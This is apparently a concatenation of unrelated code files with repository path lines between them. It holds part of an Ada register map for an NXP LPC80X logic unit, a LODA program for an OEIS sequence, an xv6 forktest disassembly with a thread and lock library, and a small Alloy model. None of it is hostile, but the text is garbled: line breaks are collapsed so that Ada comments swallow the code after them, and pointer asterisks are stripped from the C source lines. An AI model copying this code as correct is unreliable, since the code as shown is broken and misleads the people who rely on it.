WAKEINT_CTRL_FILTER_CLKSEL_Field use (Fro1Mhz => 0, Fro12Mhz => 1, Other_Clock => 2); -- Wakeup interrupt control for PLU type WAKEINT_CTRL_Register is record -- Interrupt mask (which of the 8 PLU Outputs contribute to interrupt) MASK : WAKEINT_CTRL_MASK_Field := 16#0#; -- control input of the PLU, add filtering for glitch. FILTER_MODE : WAKEINT_CTRL_FILTER_MODE_Field := NXP_SVD.PLU.Bypass; -- hclk is divided by 2filter_clksel. FILTER_CLKSEL : WAKEINT_CTRL_FILTER_CLKSEL_Field := NXP_SVD.PLU.Fro1Mhz; -- latch the interrupt , then can be cleared with next bit INTR_CLEAR LATCH_ENABLE : Boolean := False; -- Write data bit of one shall clear (set to zero) the corresponding bit -- in the field. Write to clear wakeint_latched INTR_CLEAR : Boolean := False; -- unspecified Reserved_14_31 : HAL.UInt18 := 16#0#; end record with Volatile_Full_Access, Size => 32, Bit_Order => System.Low_Order_First; for WAKEINT_CTRL_Register use record MASK at 0 range 0 .. 7; FILTER_MODE at 0 range 8 .. 9; FILTER_CLKSEL at 0 range 10 .. 11; LATCH_ENABLE at 0 range 12 .. 12; INTR_CLEAR at 0 range 13 .. 13; Reserved_14_31 at 0 range 14 .. 31; end record; -- Selects the source to be connected to PLU Output 0. type OUTPUT_MUX_OUTPUTn_Field is ( -- The PLU output 0. PLU_OUTPUT0, -- The PLU output 1. PLU_OUTPUT1, -- The PLU output 2. PLU_OUTPUT2, -- The PLU output 3. PLU_OUTPUT3, -- The PLU output 4. PLU_OUTPUT4, -- The PLU output 5. PLU_OUTPUT5, -- The PLU output 6. PLU_OUTPUT6, -- The PLU output 7. PLU_OUTPUT7, -- The PLU output 8. PLU_OUTPUT8, -- The PLU output 9. PLU_OUTPUT9, -- The PLU output 10. PLU_OUTPUT10, -- The PLU output 11. PLU_OUTPUT11, -- The PLU output 12. PLU_OUTPUT12, -- The PLU output 13. PLU_OUTPUT13, -- The PLU output 14. PLU_OUTPUT14, -- The PLU output 15. PLU_OUTPUT15, -- The PLU output 16. PLU_OUTPUT16, -- The PLU output 17. PLU_OUTPUT17, -- The PLU output 18. PLU_OUTPUT18, -- The PLU output 19. PLU_OUTPUT19, -- The PLU output 20. PLU_OUTPUT20, -- The PLU output 21. PLU_OUTPUT21, -- The PLU output 22. PLU_OUTPUT22, -- The PLU output 23. PLU_OUTPUT23, -- The PLU output 24. PLU_OUTPUT24, -- The PLU output 25. PLU_OUTPUT25, -- state(0). STATE0, -- state(1). STATE1, -- state(2). STATE2, -- state(3). STATE3) with Size => 5; for OUTPUT_MUX_OUTPUTn_Field use (PLU_OUTPUT0 => 0, PLU_OUTPUT1 => 1, PLU_OUTPUT2 => 2, PLU_OUTPUT3 => 3, PLU_OUTPUT4 => 4, PLU_OUTPUT5 => 5, PLU_OUTPUT6 => 6, PLU_OUTPUT7 => 7, PLU_OUTPUT8 => 8, PLU_OUTPUT9 => 9, PLU_OUTPUT10 => 10, PLU_OUTPUT11 => 11, PLU_OUTPUT12 => 12, PLU_OUTPUT13 => 13, PLU_OUTPUT14 => 14, PLU_OUTPUT15 => 15, PLU_OUTPUT16 => 16, PLU_OUTPUT17 => 17, PLU_OUTPUT18 => 18, PLU_OUTPUT19 => 19, PLU_OUTPUT20 => 20, PLU_OUTPUT21 => 21, PLU_OUTPUT22 => 22, PLU_OUTPUT23 => 23, PLU_OUTPUT24 => 24, PLU_OUTPUT25 => 25, STATE0 => 26, STATE1 => 27, STATE2 => 28, STATE3 => 29); -- Selects the source to be connected to PLU Output 0 type OUTPUT_MUX_Register is record -- Selects the source to be connected to PLU Output 0. OUTPUTn : OUTPUT_MUX_OUTPUTn_Field := NXP_SVD.PLU.PLU_OUTPUT0; -- unspecified Reserved_5_31 : HAL.UInt27 := 16#0#; end record with Volatile_Full_Access, Size => 32, Bit_Order => System.Low_Order_First; for OUTPUT_MUX_Register use record OUTPUTn at 0 range 0 .. 4; Reserved_5_31 at 0 range 5 .. 31; end record; -- Selects the source to be connected to PLU Output 0 type OUTPUT_MUX_Registers is array (0 .. 7) of OUTPUT_MUX_Register with Volatile; ----------------- -- Peripherals -- ----------------- -- LPC80X Programmable Logic Unit (PLU) type PLU_Peripheral is record -- no description available LUT : aliased LUT_Clusters; -- Specifies the Truth Table contents for LUT0 LUT_TRUTH : aliased LUT_TRUTH_Registers; -- Provides the current state of the 8 designated PLU Outputs. OUTPUTS : aliased OUTPUTS_Register; -- Wakeup interrupt control for PLU WAKEINT_CTRL : aliased WAKEINT_CTRL_Register; -- Selects the source to be connected to PLU Output 0 OUTPUT_MUX : aliased OUTPUT_MUX_Registers; end record with Volatile; for PLU_Peripheral use record LUT at 16#0# range 0 .. 6655; LUT_TRUTH at 16#800# range 0 .. 831; OUTPUTS at 16#900# range 0 .. 31; WAKEINT_CTRL at 16#904# range 0 .. 31; OUTPUT_MUX at 16#C00# range 0 .. 255; end record; -- LPC80X Programmable Logic Unit (PLU) PLU_Periph : aliased PLU_Peripheral with Import, Address => System'To_Address (16#4003D000#); end NXP_SVD.PLU;
programs/oeis/172/A172118.asm	neoneye/loda	22	164993	; A172118: n(n+1)(5n^2-n-3)/2. ; 0,1,45,234,730,1755,3591,6580,11124,17685,26785,39006,54990,75439,101115,132840,171496,218025,273429,338770,415170,503811,605935,722844,855900,1006525,1176201,1366470,1578934,1815255,2077155,2366416,2684880,3034449,3417085,3834810,4289706,4783915,5319639,5899140,6524740,7198821,7923825,8702254,9536670,10429695,11384011,12402360,13487544,14642425,15869925,17173026,18554770,20018259,21566655,23203180,24931116,26753805,28674649,30697110,32824710,35061031,37409715,39874464,42459040,45167265,48003021,50970250,54072954,57315195,60701095,64234836,67920660,71762869,75765825,79933950,84271726,88783695,93474459,98348680,103411080,108666441,114119605,119775474,125639010,131715235,138009231,144526140,151271164,158249565,165466665,172927846,180638550,188604279,196830595,205323120,214087536,223129585,232455069,242069850 lpb $0 mov $2,$0 sub $0,1 seq $2,51874 ; 22-gonal numbers: a(n) = n(10*n-9). add $3,$2 add $1,$3 lpe mov $0,$1
Kernel/xv6-public/forktest.asm	samyvic/OS-Project	0	709	<gh_stars>0 _forktest: file format elf32-i386 Disassembly of section .text: 00000000 <main>: printf(1, "fork test OK\n"); } int main(void) { 0: f3 0f 1e fb endbr32 4: 55 push %ebp 5: 89 e5 mov %esp,%ebp 7: 83 e4 f0 and $0xfffffff0,%esp forktest(); a: e8 41 00 00 00 call 50 <forktest> exit(); f: e8 45 04 00 00 call 459 <exit> 14: 66 90 xchg %ax,%ax 16: 66 90 xchg %ax,%ax 18: 66 90 xchg %ax,%ax 1a: 66 90 xchg %ax,%ax 1c: 66 90 xchg %ax,%ax 1e: 66 90 xchg %ax,%ax 00000020 <printf>: { 20: f3 0f 1e fb endbr32 24: 55 push %ebp 25: 89 e5 mov %esp,%ebp 27: 53 push %ebx 28: 83 ec 10 sub $0x10,%esp 2b: 8b 5d 0c mov 0xc(%ebp),%ebx write(fd, s, strlen(s)); 2e: 53 push %ebx 2f: e8 9c 01 00 00 call 1d0 <strlen> 34: 83 c4 0c add $0xc,%esp 37: 50 push %eax 38: 53 push %ebx 39: ff 75 08 pushl 0x8(%ebp) 3c: e8 38 04 00 00 call 479 <write> } 41: 8b 5d fc mov -0x4(%ebp),%ebx 44: 83 c4 10 add $0x10,%esp 47: c9 leave 48: c3 ret 49: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 00000050 <forktest>: { 50: f3 0f 1e fb endbr32 54: 55 push %ebp 55: 89 e5 mov %esp,%ebp 57: 53 push %ebx for(n=0; n<N; n++){ 58: 31 db xor %ebx,%ebx { 5a: 83 ec 10 sub $0x10,%esp write(fd, s, strlen(s)); 5d: 68 0c 05 00 00 push $0x50c 62: e8 69 01 00 00 call 1d0 <strlen> 67: 83 c4 0c add $0xc,%esp 6a: 50 push %eax 6b: 68 0c 05 00 00 push $0x50c 70: 6a 01 push $0x1 72: e8 02 04 00 00 call 479 <write> 77: 83 c4 10 add $0x10,%esp 7a: eb 15 jmp 91 <forktest+0x41> 7c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi if(pid == 0) 80: 74 58 je da <forktest+0x8a> for(n=0; n<N; n++){ 82: 83 c3 01 add $0x1,%ebx 85: 81 fb e8 03 00 00 cmp $0x3e8,%ebx 8b: 0f 84 92 00 00 00 je 123 <forktest+0xd3> pid = fork(); 91: e8 bb 03 00 00 call 451 <fork> if(pid < 0) 96: 85 c0 test %eax,%eax 98: 79 e6 jns 80 <forktest+0x30> for(; n > 0; n--){ 9a: 85 db test %ebx,%ebx 9c: 74 10 je ae <forktest+0x5e> 9e: 66 90 xchg %ax,%ax if(wait() < 0){ a0: e8 bc 03 00 00 call 461 <wait> a5: 85 c0 test %eax,%eax a7: 78 36 js df <forktest+0x8f> for(; n > 0; n--){ a9: 83 eb 01 sub $0x1,%ebx ac: 75 f2 jne a0 <forktest+0x50> if(wait() != -1){ ae: e8 ae 03 00 00 call 461 <wait> b3: 83 f8 ff cmp $0xffffffff,%eax b6: 75 49 jne 101 <forktest+0xb1> write(fd, s, strlen(s)); b8: 83 ec 0c sub $0xc,%esp bb: 68 3e 05 00 00 push $0x53e c0: e8 0b 01 00 00 call 1d0 <strlen> c5: 83 c4 0c add $0xc,%esp c8: 50 push %eax c9: 68 3e 05 00 00 push $0x53e ce: 6a 01 push $0x1 d0: e8 a4 03 00 00 call 479 <write> } d5: 8b 5d fc mov -0x4(%ebp),%ebx d8: c9 leave d9: c3 ret exit(); da: e8 7a 03 00 00 call 459 <exit> write(fd, s, strlen(s)); df: 83 ec 0c sub $0xc,%esp e2: 68 17 05 00 00 push $0x517 e7: e8 e4 00 00 00 call 1d0 <strlen> ec: 83 c4 0c add $0xc,%esp ef: 50 push %eax f0: 68 17 05 00 00 push $0x517 f5: 6a 01 push $0x1 f7: e8 7d 03 00 00 call 479 <write> exit(); fc: e8 58 03 00 00 call 459 <exit> write(fd, s, strlen(s)); 101: 83 ec 0c sub $0xc,%esp 104: 68 2b 05 00 00 push $0x52b 109: e8 c2 00 00 00 call 1d0 <strlen> 10e: 83 c4 0c add $0xc,%esp 111: 50 push %eax 112: 68 2b 05 00 00 push $0x52b 117: 6a 01 push $0x1 119: e8 5b 03 00 00 call 479 <write> exit(); 11e: e8 36 03 00 00 call 459 <exit> write(fd, s, strlen(s)); 123: 83 ec 0c sub $0xc,%esp 126: 68 4c 05 00 00 push $0x54c 12b: e8 a0 00 00 00 call 1d0 <strlen> 130: 83 c4 0c add $0xc,%esp 133: 50 push %eax 134: 68 4c 05 00 00 push $0x54c 139: 6a 01 push $0x1 13b: e8 39 03 00 00 call 479 <write> exit(); 140: e8 14 03 00 00 call 459 <exit> 145: 66 90 xchg %ax,%ax 147: 66 90 xchg %ax,%ax 149: 66 90 xchg %ax,%ax 14b: 66 90 xchg %ax,%ax 14d: 66 90 xchg %ax,%ax 14f: 90 nop 00000150 <strcpy>: uint locked; }; char* strcpy(char s, const char t) { 150: f3 0f 1e fb endbr32 154: 55 push %ebp char os; os = s; while((s++ = t++) != 0) 155: 31 c0 xor %eax,%eax { 157: 89 e5 mov %esp,%ebp 159: 53 push %ebx 15a: 8b 4d 08 mov 0x8(%ebp),%ecx 15d: 8b 5d 0c mov 0xc(%ebp),%ebx while((s++ = t++) != 0) 160: 0f b6 14 03 movzbl (%ebx,%eax,1),%edx 164: 88 14 01 mov %dl,(%ecx,%eax,1) 167: 83 c0 01 add $0x1,%eax 16a: 84 d2 test %dl,%dl 16c: 75 f2 jne 160 <strcpy+0x10> ; return os; } 16e: 89 c8 mov %ecx,%eax 170: 5b pop %ebx 171: 5d pop %ebp 172: c3 ret 173: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 17a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 00000180 <strcmp>: int strcmp(const char p, const char q) { 180: f3 0f 1e fb endbr32 184: 55 push %ebp 185: 89 e5 mov %esp,%ebp 187: 53 push %ebx 188: 8b 4d 08 mov 0x8(%ebp),%ecx 18b: 8b 55 0c mov 0xc(%ebp),%edx while(p && p == q) 18e: 0f b6 01 movzbl (%ecx),%eax 191: 0f b6 1a movzbl (%edx),%ebx 194: 84 c0 test %al,%al 196: 75 19 jne 1b1 <strcmp+0x31> 198: eb 26 jmp 1c0 <strcmp+0x40> 19a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 1a0: 0f b6 41 01 movzbl 0x1(%ecx),%eax p++, q++; 1a4: 83 c1 01 add $0x1,%ecx 1a7: 83 c2 01 add $0x1,%edx while(p && p == q) 1aa: 0f b6 1a movzbl (%edx),%ebx 1ad: 84 c0 test %al,%al 1af: 74 0f je 1c0 <strcmp+0x40> 1b1: 38 d8 cmp %bl,%al 1b3: 74 eb je 1a0 <strcmp+0x20> return (uchar)p - (uchar)q; 1b5: 29 d8 sub %ebx,%eax } 1b7: 5b pop %ebx 1b8: 5d pop %ebp 1b9: c3 ret 1ba: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 1c0: 31 c0 xor %eax,%eax return (uchar)p - (uchar)q; 1c2: 29 d8 sub %ebx,%eax } 1c4: 5b pop %ebx 1c5: 5d pop %ebp 1c6: c3 ret 1c7: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 1ce: 66 90 xchg %ax,%ax 000001d0 <strlen>: uint strlen(const char s) { 1d0: f3 0f 1e fb endbr32 1d4: 55 push %ebp 1d5: 89 e5 mov %esp,%ebp 1d7: 8b 55 08 mov 0x8(%ebp),%edx int n; for(n = 0; s[n]; n++) 1da: 80 3a 00 cmpb $0x0,(%edx) 1dd: 74 21 je 200 <strlen+0x30> 1df: 31 c0 xor %eax,%eax 1e1: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 1e8: 83 c0 01 add $0x1,%eax 1eb: 80 3c 02 00 cmpb $0x0,(%edx,%eax,1) 1ef: 89 c1 mov %eax,%ecx 1f1: 75 f5 jne 1e8 <strlen+0x18> ; return n; } 1f3: 89 c8 mov %ecx,%eax 1f5: 5d pop %ebp 1f6: c3 ret 1f7: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 1fe: 66 90 xchg %ax,%ax for(n = 0; s[n]; n++) 200: 31 c9 xor %ecx,%ecx } 202: 5d pop %ebp 203: 89 c8 mov %ecx,%eax 205: c3 ret 206: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 20d: 8d 76 00 lea 0x0(%esi),%esi 00000210 <memset>: void* memset(void dst, int c, uint n) { 210: f3 0f 1e fb endbr32 214: 55 push %ebp 215: 89 e5 mov %esp,%ebp 217: 57 push %edi 218: 8b 55 08 mov 0x8(%ebp),%edx } static inline void stosb(void addr, int data, int cnt) { asm volatile("cld; rep stosb" : 21b: 8b 4d 10 mov 0x10(%ebp),%ecx 21e: 8b 45 0c mov 0xc(%ebp),%eax 221: 89 d7 mov %edx,%edi 223: fc cld 224: f3 aa rep stos %al,%es:(%edi) stosb(dst, c, n); return dst; } 226: 89 d0 mov %edx,%eax 228: 5f pop %edi 229: 5d pop %ebp 22a: c3 ret 22b: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 22f: 90 nop 00000230 <strchr>: char* strchr(const char s, char c) { 230: f3 0f 1e fb endbr32 234: 55 push %ebp 235: 89 e5 mov %esp,%ebp 237: 8b 45 08 mov 0x8(%ebp),%eax 23a: 0f b6 4d 0c movzbl 0xc(%ebp),%ecx for(; s; s++) 23e: 0f b6 10 movzbl (%eax),%edx 241: 84 d2 test %dl,%dl 243: 75 16 jne 25b <strchr+0x2b> 245: eb 21 jmp 268 <strchr+0x38> 247: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 24e: 66 90 xchg %ax,%ax 250: 0f b6 50 01 movzbl 0x1(%eax),%edx 254: 83 c0 01 add $0x1,%eax 257: 84 d2 test %dl,%dl 259: 74 0d je 268 <strchr+0x38> if(s == c) 25b: 38 d1 cmp %dl,%cl 25d: 75 f1 jne 250 <strchr+0x20> return (char)s; return 0; } 25f: 5d pop %ebp 260: c3 ret 261: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi return 0; 268: 31 c0 xor %eax,%eax } 26a: 5d pop %ebp 26b: c3 ret 26c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 00000270 <gets>: char* gets(char buf, int max) { 270: f3 0f 1e fb endbr32 274: 55 push %ebp 275: 89 e5 mov %esp,%ebp 277: 57 push %edi 278: 56 push %esi int i, cc; char c; for(i=0; i+1 < max; ){ 279: 31 f6 xor %esi,%esi { 27b: 53 push %ebx 27c: 89 f3 mov %esi,%ebx 27e: 83 ec 1c sub $0x1c,%esp 281: 8b 7d 08 mov 0x8(%ebp),%edi for(i=0; i+1 < max; ){ 284: eb 33 jmp 2b9 <gets+0x49> 286: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 28d: 8d 76 00 lea 0x0(%esi),%esi cc = read(0, &c, 1); 290: 83 ec 04 sub $0x4,%esp 293: 8d 45 e7 lea -0x19(%ebp),%eax 296: 6a 01 push $0x1 298: 50 push %eax 299: 6a 00 push $0x0 29b: e8 d1 01 00 00 call 471 <read> if(cc < 1) 2a0: 83 c4 10 add $0x10,%esp 2a3: 85 c0 test %eax,%eax 2a5: 7e 1c jle 2c3 <gets+0x53> break; buf[i++] = c; 2a7: 0f b6 45 e7 movzbl -0x19(%ebp),%eax 2ab: 83 c7 01 add $0x1,%edi 2ae: 88 47 ff mov %al,-0x1(%edi) if(c == '\n' \|\| c == '\r') 2b1: 3c 0a cmp $0xa,%al 2b3: 74 23 je 2d8 <gets+0x68> 2b5: 3c 0d cmp $0xd,%al 2b7: 74 1f je 2d8 <gets+0x68> for(i=0; i+1 < max; ){ 2b9: 83 c3 01 add $0x1,%ebx 2bc: 89 fe mov %edi,%esi 2be: 3b 5d 0c cmp 0xc(%ebp),%ebx 2c1: 7c cd jl 290 <gets+0x20> 2c3: 89 f3 mov %esi,%ebx break; } buf[i] = '\0'; return buf; } 2c5: 8b 45 08 mov 0x8(%ebp),%eax buf[i] = '\0'; 2c8: c6 03 00 movb $0x0,(%ebx) } 2cb: 8d 65 f4 lea -0xc(%ebp),%esp 2ce: 5b pop %ebx 2cf: 5e pop %esi 2d0: 5f pop %edi 2d1: 5d pop %ebp 2d2: c3 ret 2d3: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 2d7: 90 nop 2d8: 8b 75 08 mov 0x8(%ebp),%esi 2db: 8b 45 08 mov 0x8(%ebp),%eax 2de: 01 de add %ebx,%esi 2e0: 89 f3 mov %esi,%ebx buf[i] = '\0'; 2e2: c6 03 00 movb $0x0,(%ebx) } 2e5: 8d 65 f4 lea -0xc(%ebp),%esp 2e8: 5b pop %ebx 2e9: 5e pop %esi 2ea: 5f pop %edi 2eb: 5d pop %ebp 2ec: c3 ret 2ed: 8d 76 00 lea 0x0(%esi),%esi 000002f0 <stat>: int stat(const char n, struct stat st) { 2f0: f3 0f 1e fb endbr32 2f4: 55 push %ebp 2f5: 89 e5 mov %esp,%ebp 2f7: 56 push %esi 2f8: 53 push %ebx int fd; int r; fd = open(n, O_RDONLY); 2f9: 83 ec 08 sub $0x8,%esp 2fc: 6a 00 push $0x0 2fe: ff 75 08 pushl 0x8(%ebp) 301: e8 93 01 00 00 call 499 <open> if(fd < 0) 306: 83 c4 10 add $0x10,%esp 309: 85 c0 test %eax,%eax 30b: 78 2b js 338 <stat+0x48> return -1; r = fstat(fd, st); 30d: 83 ec 08 sub $0x8,%esp 310: ff 75 0c pushl 0xc(%ebp) 313: 89 c3 mov %eax,%ebx 315: 50 push %eax 316: e8 96 01 00 00 call 4b1 <fstat> close(fd); 31b: 89 1c 24 mov %ebx,(%esp) r = fstat(fd, st); 31e: 89 c6 mov %eax,%esi close(fd); 320: e8 5c 01 00 00 call 481 <close> return r; 325: 83 c4 10 add $0x10,%esp } 328: 8d 65 f8 lea -0x8(%ebp),%esp 32b: 89 f0 mov %esi,%eax 32d: 5b pop %ebx 32e: 5e pop %esi 32f: 5d pop %ebp 330: c3 ret 331: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi return -1; 338: be ff ff ff ff mov $0xffffffff,%esi 33d: eb e9 jmp 328 <stat+0x38> 33f: 90 nop 00000340 <atoi>: int atoi(const char s) { 340: f3 0f 1e fb endbr32 344: 55 push %ebp 345: 89 e5 mov %esp,%ebp 347: 53 push %ebx 348: 8b 55 08 mov 0x8(%ebp),%edx int n; n = 0; while('0' <= s && s <= '9') 34b: 0f be 02 movsbl (%edx),%eax 34e: 8d 48 d0 lea -0x30(%eax),%ecx 351: 80 f9 09 cmp $0x9,%cl n = 0; 354: b9 00 00 00 00 mov $0x0,%ecx while('0' <= s && s <= '9') 359: 77 1a ja 375 <atoi+0x35> 35b: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 35f: 90 nop n = n10 + s++ - '0'; 360: 83 c2 01 add $0x1,%edx 363: 8d 0c 89 lea (%ecx,%ecx,4),%ecx 366: 8d 4c 48 d0 lea -0x30(%eax,%ecx,2),%ecx while('0' <= s && s <= '9') 36a: 0f be 02 movsbl (%edx),%eax 36d: 8d 58 d0 lea -0x30(%eax),%ebx 370: 80 fb 09 cmp $0x9,%bl 373: 76 eb jbe 360 <atoi+0x20> return n; } 375: 89 c8 mov %ecx,%eax 377: 5b pop %ebx 378: 5d pop %ebp 379: c3 ret 37a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 00000380 <memmove>: void* memmove(void vdst, const void vsrc, int n) { 380: f3 0f 1e fb endbr32 384: 55 push %ebp 385: 89 e5 mov %esp,%ebp 387: 57 push %edi 388: 8b 45 10 mov 0x10(%ebp),%eax 38b: 8b 55 08 mov 0x8(%ebp),%edx 38e: 56 push %esi 38f: 8b 75 0c mov 0xc(%ebp),%esi char dst; const char src; dst = vdst; src = vsrc; while(n-- > 0) 392: 85 c0 test %eax,%eax 394: 7e 0f jle 3a5 <memmove+0x25> 396: 01 d0 add %edx,%eax dst = vdst; 398: 89 d7 mov %edx,%edi 39a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi dst++ = src++; 3a0: a4 movsb %ds:(%esi),%es:(%edi) while(n-- > 0) 3a1: 39 f8 cmp %edi,%eax 3a3: 75 fb jne 3a0 <memmove+0x20> return vdst; } 3a5: 5e pop %esi 3a6: 89 d0 mov %edx,%eax 3a8: 5f pop %edi 3a9: 5d pop %ebp 3aa: c3 ret 3ab: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 3af: 90 nop 000003b0 <thread_create>: //thread library int thread_create(void(start_routine)(void,void),void arg1 ,void* arg2) { 3b0: f3 0f 1e fb endbr32 3b4: 55 push %ebp 3b5: 89 e5 mov %esp,%ebp 3b7: 83 ec 14 sub $0x14,%esp void* stack; stack =sbrk(4096); //pgsize 3ba: 68 00 10 00 00 push $0x1000 3bf: e8 1d 01 00 00 call 4e1 <sbrk> return clone(start_routine,arg1,arg2,stack); 3c4: 50 push %eax 3c5: ff 75 10 pushl 0x10(%ebp) 3c8: ff 75 0c pushl 0xc(%ebp) 3cb: ff 75 08 pushl 0x8(%ebp) 3ce: e8 26 01 00 00 call 4f9 <clone> } 3d3: c9 leave 3d4: c3 ret 3d5: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 3dc: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 000003e0 <thread_join>: int thread_join() { 3e0: f3 0f 1e fb endbr32 3e4: 55 push %ebp 3e5: 89 e5 mov %esp,%ebp 3e7: 83 ec 24 sub $0x24,%esp void * stackPtr; int x = join(&stackPtr); 3ea: 8d 45 f4 lea -0xc(%ebp),%eax 3ed: 50 push %eax 3ee: e8 0e 01 00 00 call 501 <join> return x; } 3f3: c9 leave 3f4: c3 ret 3f5: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 3fc: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 00000400 <lock_init>: void lock_init(struct lock_t lk){ 400: f3 0f 1e fb endbr32 404: 55 push %ebp 405: 89 e5 mov %esp,%ebp lk->locked=0; //intialize as unnlocked 407: 8b 45 08 mov 0x8(%ebp),%eax 40a: c7 00 00 00 00 00 movl $0x0,(%eax) } 410: 5d pop %ebp 411: c3 ret 412: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 419: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 00000420 <lock_acquire>: void lock_acquire(struct lock_t lk){ 420: f3 0f 1e fb endbr32 424: 55 push %ebp xchg(volatile uint addr, uint newval) { uint result; // The + in "+m" denotes a read-modify-write operand. asm volatile("lock; xchgl %0, %1" : 425: b9 01 00 00 00 mov $0x1,%ecx 42a: 89 e5 mov %esp,%ebp 42c: 8b 55 08 mov 0x8(%ebp),%edx 42f: 90 nop 430: 89 c8 mov %ecx,%eax 432: f0 87 02 lock xchg %eax,(%edx) while(xchg(&lk->locked,1) != 0); 435: 85 c0 test %eax,%eax 437: 75 f7 jne 430 <lock_acquire+0x10> } 439: 5d pop %ebp 43a: c3 ret 43b: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 43f: 90 nop 00000440 <lock_release>: void lock_release(struct lock_t lk){ 440: f3 0f 1e fb endbr32 444: 55 push %ebp 445: 31 c0 xor %eax,%eax 447: 89 e5 mov %esp,%ebp 449: 8b 55 08 mov 0x8(%ebp),%edx 44c: f0 87 02 lock xchg %eax,(%edx) xchg(&lk->locked,0) ; } 44f: 5d pop %ebp 450: c3 ret 00000451 <fork>: name: \ movl $SYS_ ## name, %eax; \ int $T_SYSCALL; \ ret SYSCALL(fork) 451: b8 01 00 00 00 mov $0x1,%eax 456: cd 40 int $0x40 458: c3 ret 00000459 <exit>: SYSCALL(exit) 459: b8 02 00 00 00 mov $0x2,%eax 45e: cd 40 int $0x40 460: c3 ret 00000461 <wait>: SYSCALL(wait) 461: b8 03 00 00 00 mov $0x3,%eax 466: cd 40 int $0x40 468: c3 ret 00000469 <pipe>: SYSCALL(pipe) 469: b8 04 00 00 00 mov $0x4,%eax 46e: cd 40 int $0x40 470: c3 ret 00000471 <read>: SYSCALL(read) 471: b8 05 00 00 00 mov $0x5,%eax 476: cd 40 int $0x40 478: c3 ret 00000479 <write>: SYSCALL(write) 479: b8 10 00 00 00 mov $0x10,%eax 47e: cd 40 int $0x40 480: c3 ret 00000481 <close>: SYSCALL(close) 481: b8 15 00 00 00 mov $0x15,%eax 486: cd 40 int $0x40 488: c3 ret 00000489 <kill>: SYSCALL(kill) 489: b8 06 00 00 00 mov $0x6,%eax 48e: cd 40 int $0x40 490: c3 ret 00000491 <exec>: SYSCALL(exec) 491: b8 07 00 00 00 mov $0x7,%eax 496: cd 40 int $0x40 498: c3 ret 00000499 <open>: SYSCALL(open) 499: b8 0f 00 00 00 mov $0xf,%eax 49e: cd 40 int $0x40 4a0: c3 ret 000004a1 <mknod>: SYSCALL(mknod) 4a1: b8 11 00 00 00 mov $0x11,%eax 4a6: cd 40 int $0x40 4a8: c3 ret 000004a9 <unlink>: SYSCALL(unlink) 4a9: b8 12 00 00 00 mov $0x12,%eax 4ae: cd 40 int $0x40 4b0: c3 ret 000004b1 <fstat>: SYSCALL(fstat) 4b1: b8 08 00 00 00 mov $0x8,%eax 4b6: cd 40 int $0x40 4b8: c3 ret 000004b9 <link>: SYSCALL(link) 4b9: b8 13 00 00 00 mov $0x13,%eax 4be: cd 40 int $0x40 4c0: c3 ret 000004c1 <mkdir>: SYSCALL(mkdir) 4c1: b8 14 00 00 00 mov $0x14,%eax 4c6: cd 40 int $0x40 4c8: c3 ret 000004c9 <chdir>: SYSCALL(chdir) 4c9: b8 09 00 00 00 mov $0x9,%eax 4ce: cd 40 int $0x40 4d0: c3 ret 000004d1 <dup>: SYSCALL(dup) 4d1: b8 0a 00 00 00 mov $0xa,%eax 4d6: cd 40 int $0x40 4d8: c3 ret 000004d9 <getpid>: SYSCALL(getpid) 4d9: b8 0b 00 00 00 mov $0xb,%eax 4de: cd 40 int $0x40 4e0: c3 ret 000004e1 <sbrk>: SYSCALL(sbrk) 4e1: b8 0c 00 00 00 mov $0xc,%eax 4e6: cd 40 int $0x40 4e8: c3 ret 000004e9 <sleep>: SYSCALL(sleep) 4e9: b8 0d 00 00 00 mov $0xd,%eax 4ee: cd 40 int $0x40 4f0: c3 ret 000004f1 <uptime>: SYSCALL(uptime) 4f1: b8 0e 00 00 00 mov $0xe,%eax 4f6: cd 40 int $0x40 4f8: c3 ret 000004f9 <clone>: SYSCALL(clone) 4f9: b8 16 00 00 00 mov $0x16,%eax 4fe: cd 40 int $0x40 500: c3 ret 00000501 <join>: 501: b8 17 00 00 00 mov $0x17,%eax 506: cd 40 int $0x40 508: c3 ret
alloy4fun_models/trashltl/models/14/63MbKHt59DhniMdKb.als	Kaixi26/org.alloytools.alloy	0	4320	open main pred id63MbKHt59DhniMdKb_prop15 { all f:File \| eventually (f not in Trash implies f in Trash) } pred __repair { id63MbKHt59DhniMdKb_prop15 } check __repair { id63MbKHt59DhniMdKb_prop15 <=> prop15o }
